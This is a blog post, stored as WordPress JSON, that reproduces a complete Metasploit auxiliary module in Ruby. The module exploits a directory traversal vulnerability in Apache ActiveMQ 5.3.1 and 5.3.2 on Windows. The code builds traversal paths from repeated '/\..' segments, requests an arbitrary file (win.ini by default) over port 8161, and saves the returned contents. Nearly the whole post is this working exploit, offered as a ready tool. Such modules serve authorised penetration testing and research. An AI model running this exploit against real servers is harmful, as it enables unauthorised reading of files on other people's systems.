{"id":59352,"date":"2024-09-01T20:29:35","date_gmt":"2024-09-01T17:29:35","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181177\/apache_activemq_traversal.rb.txt"},"modified":"2024-09-01T20:29:35","modified_gmt":"2024-09-01T17:29:35","slug":"apache-activemq-directory-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/apache-activemq-directory-traversal\/","title":{"rendered":"Apache ActiveMQ Directory Traversal"},"content":{"rendered":"<p>##<br \/># This module requires Metasploit: https:\/\/metasploit.com\/download<br \/># Current source: https:\/\/github.com\/rapid7\/metasploit-framework<br \/>##<\/p>\n<p>class MetasploitModule &lt; Msf::Auxiliary<br \/>include Msf::Exploit::Remote::HttpClient<br \/>include Msf::Auxiliary::Report<br \/>include Msf::Auxiliary::Scanner<\/p>\n<p>def initialize(info = {})<br \/>super(update_info(info,<br \/>&#8216;Name&#8217; =&gt; &#8216;Apache ActiveMQ Directory Traversal&#8217;,<br \/>&#8216;Description&#8217; =&gt; %q{<br \/>This module exploits a directory traversal vulnerability in Apache ActiveMQ<br \/>5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty&#8217;s<br \/>ResourceHandler installed with the affected versions. This module has been tested<br \/>successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.<br \/>},<br \/>&#8216;License&#8217; =&gt; MSF_LICENSE,<br \/>&#8216;Author&#8217; =&gt;<br \/>[<br \/>&#8216;AbdulAziz Hariri&#8217;, # Vulnerability discovery<br \/>&#8216;juan vazquez&#8217; # Metasploit module<br \/>],<br \/>&#8216;References&#8217; =&gt;<br \/>[<br \/>[ &#8216;OSVDB&#8217;, &#8216;86401&#8217; ],<br \/>[ &#8216;URL&#8217;, &#8216;http:\/\/www.verisigninc.com\/en_US\/products-and-services\/network-intelligence-availability\/idefense\/public-vulnerability-reports\/articles\/index.xhtml?id=895&#8217; ],<br \/>[ &#8216;URL&#8217;, &#8216;https:\/\/issues.apache.org\/jira\/browse\/amq-2788&#8217; ]]))<\/p>\n<p>register_options(<br \/>[<br \/>Opt::RPORT(8161),<br \/>OptString.new(&#8216;FILEPATH&#8217;, [true, &#8216;The name of the file to download&#8217;, &#8216;\/windows\\\\win.ini&#8217;]),<br \/>OptInt.new(&#8216;DEPTH&#8217;, [false, &#8216;Traversal depth if absolute is set to false&#8217;, 4])<br \/>])<br \/>end<\/p>\n<p>def run_host(ip)<br \/># No point to continue if no filename is specified<br \/>if datastore[&#8216;FILEPATH&#8217;].nil? or datastore[&#8216;FILEPATH&#8217;].empty?<br \/>print_error(&#8220;#{rhost}:#{rport} &#8211; Please supply FILEPATH&#8221;)<br \/>return<br \/>end<\/p>\n<p>travs = &#8220;\/\\\\..&#8221; * (datastore[&#8216;DEPTH&#8217;] || 1)<br \/>travs &lt;&lt; &#8220;\/&#8221; unless datastore[&#8216;FILEPATH&#8217;][0] == &#8220;\\\\&#8221; or datastore[&#8216;FILEPATH&#8217;][0] == &#8220;\/&#8221;<br \/>travs &lt;&lt; datastore[&#8216;FILEPATH&#8217;]\n<p>print_status(&#8220;#{rhost}:#{rport} &#8211; Sending request&#8230;&#8221;)<br \/>res = send_request_cgi({<br \/>&#8216;uri&#8217; =&gt; travs,<br \/>&#8216;method&#8217; =&gt; &#8216;GET&#8217;,<br \/>})<\/p>\n<p>if res and res.code == 200<br \/>contents = res.body<br \/>fname = File.basename(datastore[&#8216;FILEPATH&#8217;])<br \/>path = store_loot(<br \/>&#8216;apache.activemq&#8217;,<br \/>&#8216;application\/octet-stream&#8217;,<br \/>ip,<br \/>contents,<br \/>fname<br \/>)<br \/>print_status(&#8220;#{rhost}:#{rport} &#8211; File saved in: #{path}&#8221;)<br \/>else<br \/>print_error(&#8220;#{rhost}:#{rport} &#8211; Failed to retrieve file&#8221;)<br \/>return<br \/>end<br \/>end<br \/>end<\/p>\n","protected":false},"excerpt":{"rendered":"<p>### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule &lt; Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Scanner def initialize(info = {})super(update_info(info,&#8216;Name&#8217; =&gt; &#8216;Apache ActiveMQ Directory Traversal&#8217;,&#8216;Description&#8217; =&gt; %q{This module exploits a directory traversal vulnerability in Apache ActiveMQ5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty&#8217;sResourceHandler installed with the affected versions. This module has &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59352","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59352","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59352"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59352\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59352"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59352"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59352"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}